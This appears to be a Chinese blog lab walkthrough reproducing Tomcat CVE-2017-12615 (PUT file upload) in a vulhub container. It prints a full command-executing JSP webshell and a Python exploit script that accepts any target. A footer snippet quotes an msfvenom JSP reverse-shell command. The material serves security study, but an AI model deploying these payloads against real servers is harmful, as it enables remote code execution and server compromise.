Tomcat CVE-2017-12615 PUT任意文件上传

最新推荐文章于 2023-09-09 22:00:00 发布
最新推荐文章于 2023-09-09 22:00:00 发布
阅读量422 收藏
点赞数
分类专栏: 中间件漏洞 文章标签: tomcat 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/116756962
版权

Tomcat CVE-2017-12615 PUT任意文件上传

漏洞原理:传送门

实验环境

主机角色IP
centos8漏洞靶机192.168.1.80
windows10攻击主机(burp)192.168.1.120

实验流程

开启漏洞靶机centos8

# 进入vulhub目录
cd /usr/sbin/vulhub/tomcat/CVE-2017-12615

# 创建docker镜像
docker-compose build

# 启动docker镜像
docker-compose up -d

查看tomcat关键的配置文件

vim Dockerfile

image-20210512110005016

cat /usr/local/tomcat/conf/web.xml | grep ‘<init-param>’

image-20210513163849179

向目标url发送一个options方法的请求,用来获知服务器允许的实际请求(看其中是否有PUT)

OPTIONS /shell.jsp/ HTTP/1.1
Host: 192.168.1.80:8080
Content-Length:5

shell

image-20210512112013273

如上图所示,返回的Allow字段中含有PUT方法,说明服务器允许PUT请求。

尝试使用PUT方法上传一个文件shell.jsp:

image-20210512112827287

用浏览器尝试访问该文件:

image-20210512112845567

如图所示,成功访问。

尝试上传一个webshell,内容如下:

<%@
page language="java"
import="java.util.*,java.io.*"
pageEncoding = "UTF-8"
%>
<%!public static String excuteCmd(String c) {
	StringBuilder line = new StringBuilder();
	try {
		Process pro = Runtime.getRuntime().exec(c);
		BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
		String temp = null;
		while ((temp = buf.readLine()) != null){
			line.append(temp+"\\n");
		}
		buf.close();
	} catch (Exception e) {
		line.append(e.getMessage());
	}
	return line.toString();
}
%>
<%
if(!"".equals(request.getParameter("cmd"))){
	out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}else{
	out.println(":-)");
}
%>

image-20210512140142646

访问上传的webshell:

image-20210512140251290

成功!

为方便复现漏洞,可以编写一个python脚本:

import http.client,sys
import time

#target = sys.argv[1]
file_name = str(int(time.time()))+'.jsp'   #以时间戳作为文件名,防止重名
body = '''<%@
page language="java"
import="java.util.*,java.io.*"
pageEncoding = "UTF-8"
%>
<%!public static String excuteCmd(String c) {
	StringBuilder line = new StringBuilder();
	try {
		Process pro = Runtime.getRuntime().exec(c);
		BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
		String temp = null;
		while ((temp = buf.readLine()) != null){
			line.append(temp+"\\n");
		}
		buf.close();
	} catch (Exception e) {
		line.append(e.getMessage());
	}
	return line.toString();
	}
%>
<%
if(!"".equals(request.getParameter("cmd"))){
	out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}else{
	out.println(":-)");}
%>
'''
target = sys.argv[1]     #接收一个参数,作为目标url
try:
    conn = http.client.HTTPConnection(target)    #对目标进行http连接
    conn.request(method='OPTIONS',url="/mapx")         #用options方法对目标url发起请求(路径随意)
    headers = dict(conn.getresponse().getheaders())   #获取响应头,作为一个字典
    #print(headers)
    if 'Allow' in headers and headers['Allow'].find('PUT') > 0:  #查找响应头的Allow字段是否含有PUT
        conn.close()          #关闭http连接
        conn = http.client.HTTPConnection(target)            
        url = "/" + file_name + "/"    #注意,一定要在filename后加/,这样才可以让tomact将shell.jsp/当作非jsp文件,让DefaultServlet去处理
        #url = "/" + str(int(time.time()))+'.jsp::$DATA'
        conn.request(method='PUT', url=url, body=body)      #使用PUT方式发送HTTP请求
        res = conn.getresponse()         #获取response对象
        if res.status == 201:
            try:
                #请求上传的文件,校验是否上传成功可被访问
                conn = http.client.HTTPConnection(target)  
                conn.request(method='GET',url=url)  #请求上传的文件
                html = conn.getresponse().read()    #获取respose
                html = html.decode()    
                if file_name in html:      #查找filename是否在html中
                    print('shell:' + target + url[:-1])   #输出文件名和url
                    result = 'vulnerable'
                else:
                    print('upload faild')
                    result = 'vulnerable'
            except Exception as e:
                result = 'not vulnerable'
                print('Error:',e)

        elif res.status == 204:   #204说明文件重名
            result = 'not vulnerable'
            print('file exists')
        else:
            result = 'not vulnerable'
            print('error')
        conn.close()
    else:
        result = 'not vulnerable'
        print('Server not vulnerable')
except Exception as e:
    print('Error',e)

运行python脚本,传入目标url:

image-20210513165430475

访问该文件,并传入命令参数:

image-20210513165531657

成功!

0ak1ey
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-12615-master.zip
09-04
在`CVE-2017-12615-master.zip`文件中,可能包含了用于演示漏洞利用的工具和脚本。这些工具通常会模拟一个恶意的HTTP请求,其中包含能够触发远程代码执行的OGNL表达式。攻击者可以使用这些工具测试他们的目标系统...
CVE-2017-12615 Tomcat PUT 任意文件上传 漏洞利用教程
凝聚力安全团队
11-14 2159
目录漏洞描述影响版本漏洞环境搭建漏洞检测漏洞利用漏洞加固 漏洞描述   在启用HTTP PUT的Windows上运行Apache Tomcat 7.0.0至7.0.79时(例如,通过将Default的只读初始化参数设置为false),可以通过特制请求将JSP文件上载到服务器。然后可以请求此JSP,并且服务器将执行其中包含的所有代码。 影响版本 tomcat 7.0.0至7.0.79 漏洞环境搭建 漏洞检测 漏洞利用 漏洞加固 ...
Tomcat put方法任意文件上传漏洞(CVE-2017-12615)复现
君莫hacker的博客
09-15 7341
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现1. 访问主页2. 漏洞测试3. 上传jsp木马--命令执行4. 上传成功,执行命令5. 上传jsp一句话木马6. 上传成功,冰蝎连接0x04 漏洞修复 0x01 漏洞介绍 漏洞描述 在一定条件下,攻击者可以利用这个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在安全风险 漏洞编号 CV
tomcat任意文件上传
Z_l123的博客
02-24 507
环境搭建 1.安装docker yum -y install docker 2.拉取vulfocus镜像 docker pull vulfocus/vulfocus:latest 3.运行vulfocus docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.254.128 vulfocus/vulfocus #如果端口被占用,则命令执行不成功(可以将80:80改为:10
tomcat 服务器上传文件,新建目录权限问题
二毛哥哥的博客
05-18 2188
1、场景:在已搭建FTP服务器上,通过本机tomcat服务器写文件,文件夹的权限总是为 750 2、最初以为是FTP 配置文件配置导致的,后发现为 tomcat 服务器在上传文件时有自己的编码 参考文档 ...
TomcatPUT的文件上传漏洞(CVE-2017-12615)
weixin_52458793的博客
02-12 1151
详细教程
CVE-2017-12615利用脚本
04-16
CVE-2017-12615是一个在Apache Tomcat服务器中发现的安全漏洞,该漏洞允许攻击者通过PUT方法上传恶意文件并执行任意命令,从而对系统造成严重的安全威胁。这个漏洞主要涉及到Tomcat文件上传功能,特别是其处理...
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
Tomcat任意文件上传CVE-2017-12615
m0_73720136的博客
05-07 1088
掌握文件上传中的Tomcat任意文件上传CVE-2017-12615)漏洞影响的Tomcat版本以及配置文件,利用Burp Suite工具抓取数据包,将数据包内容修改,请求方式修改为PUT方式,上传新建的jsp脚本文件,文件内容可以任意编写,也可以是木马。1. NTFS文件流2. 文件名相关限制可以采取一些方法来绕过限制,比如Windows中文件名不能以空格结尾,在文件名后面加空格"%20",也可以加斜杠"/"。
Tomcat put任意文件上传
z.mumu的博客
09-10 1233
1.Tomcat8.5.19漏洞 PUT方法任意写文件漏洞(CVE-2017-12615) 打开burp尝试put方法任意文件上传 抓取页面,然后将Get方法改成PUT,注意文件名要/文件名/,然后内容直接空一行写在下面,返回201。 冰蝎连接 也可以使用msf生成jsp的木马进行连接 msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机ip LPORT=端口 -f raw > shell.jsp 然后msf设置监听访问 最后就是使用现有的exp 我
Tomcat 通过 PUT 方法任意写入文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1079
CVE-2017-12615 对应的漏洞为任意文件写入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件 。Tomcat设置了写权限(readonly=false),导致可以使用PUT方法上传任意文件。
任意文件上传
最新发布
cgjil的博客
09-09 476
通过Web 方式,使用HTTP| HTTPS 协议传递命令消息到服务器,并且继承了Web 用户的权限,在服务器上远程执行命令。Web 应用开放了文件上传功能,没有对上传的文件做足够的限制和过滤。WebShell 接收来自于Web 用户的命令,然后在服务器端执行,也称为网站木马、木马后门、网马等。上传文件重命名,尽量少的从客户端获取信息,包括文件名、文件类型、文件内容等;通过恶意文件,利用其他漏洞拿到管理员权限(提权),导致服务器沦陷。Web 服务器开启文件上传功能,Web 用户可以使用该功能。
Tomcat中间件PUT漏洞-任意文件上传漏洞
weixin_46411728的博客
08-11 697
Tomcat中间件PUT任意文件上传漏洞
IIS put上传漏洞
dqd66的博客
10-17 1423
2.更改后缀(使用copy或者move方法 将上传好的文本文件复制到cmd.asp 中 然后使用中国菜刀连接)会在返回的 Allow 消息头中,包含 PUT,MOVE,COPY 可能存在IIS PUT上传漏洞。导致HTTP支持PUT相关方法,导致IIS上传漏洞 用户可以向指定目录上传任意文件。IIS Put 上传漏洞前提 :1,IIS开启WebDAV。1.上传(使用PUT方法 上传文本文件 1.txt)3,设置站点目录权限,是的IIS用户不具有写入权限。//chopper是密码。IIS put上传漏洞。
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615
m0_52701599的博客
02-12 960
Tomcat PUT方法任意写文件漏洞
【vulfocus】tomcat文件上传 (CVE-2017-12615)
RexHa的博客
10-17 1409
vulfocus靶场 tomcat-文件上传 名称: vulfocus/tomcat-cve_2017_12615:latest
中间件漏洞详解(iss、apache、nginx、tomcat、weblogic、jboss)
m0_50818626的博客
07-13 1987
(1)(2)(3)(1)(2)(1)(2)(1)(2)(3)(1)(2)(1)(2)(3)
cve-2017-12615脚本
09-04
CVE-2017-12615是一个由Apache Tomcat服务器引起的漏洞,它存在Tomcat服务器的默认配置中。该漏洞使得攻击者能够通过进行远程命令执行来获取服务器的控制权。 该脚本的实现过程如下: 1. 首先,通过发送特制的HTTP请求,攻击者可以将恶意的Web应用程序(如war文件)上传到Tomcat服务器中。 2. 接下来,攻击者发送另一个特制的HTTP请求,触发Tomcat服务器对上传的Web应用程序进行部署。 3. 当Tomcat服务器部署恶意的Web应用程序时,该程序中的恶意代码将被执行。 4. 攻击者可以在恶意代码中包含任意的系统命令,从而实现远程命令执行。 5. 一旦成功执行命令,攻击者就能够在服务器上执行各种操作,例如文件读取/写入、系统信息获取等。 为了防御CVE-2017-12615漏洞,可以采取以下措施: 1. 及时更新和升级Apache Tomcat服务器,确保使用的版本没有漏洞。 2. 将Apache Tomcat和其他组件配置为具有最低特权,以减少潜在攻击者的影响范围。 3. 限制对Tomcat管理接口的访问,并使用强密码和多因素身份验证来保护管理接口。 4. 定期检查服务器上是否存在未知的应用程序文件或恶意代码,并将其删除。 5. 在Tomcat服务器上使用Web应用程序防火墙,以检测和阻止恶意HTTP请求。 6. 实施网络入侵检测系统(IDS)和入侵防御系统(IPS),以便及时检测和阻止攻击。 综上所述,CVE-2017-12615是一个严重的远程代码执行漏洞,攻击者通过利用该漏洞可以获取Tomcat服务器的控制权。为了避免受到此漏洞的攻击,我们必须采取一系列措施来确保Tomcat服务器安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值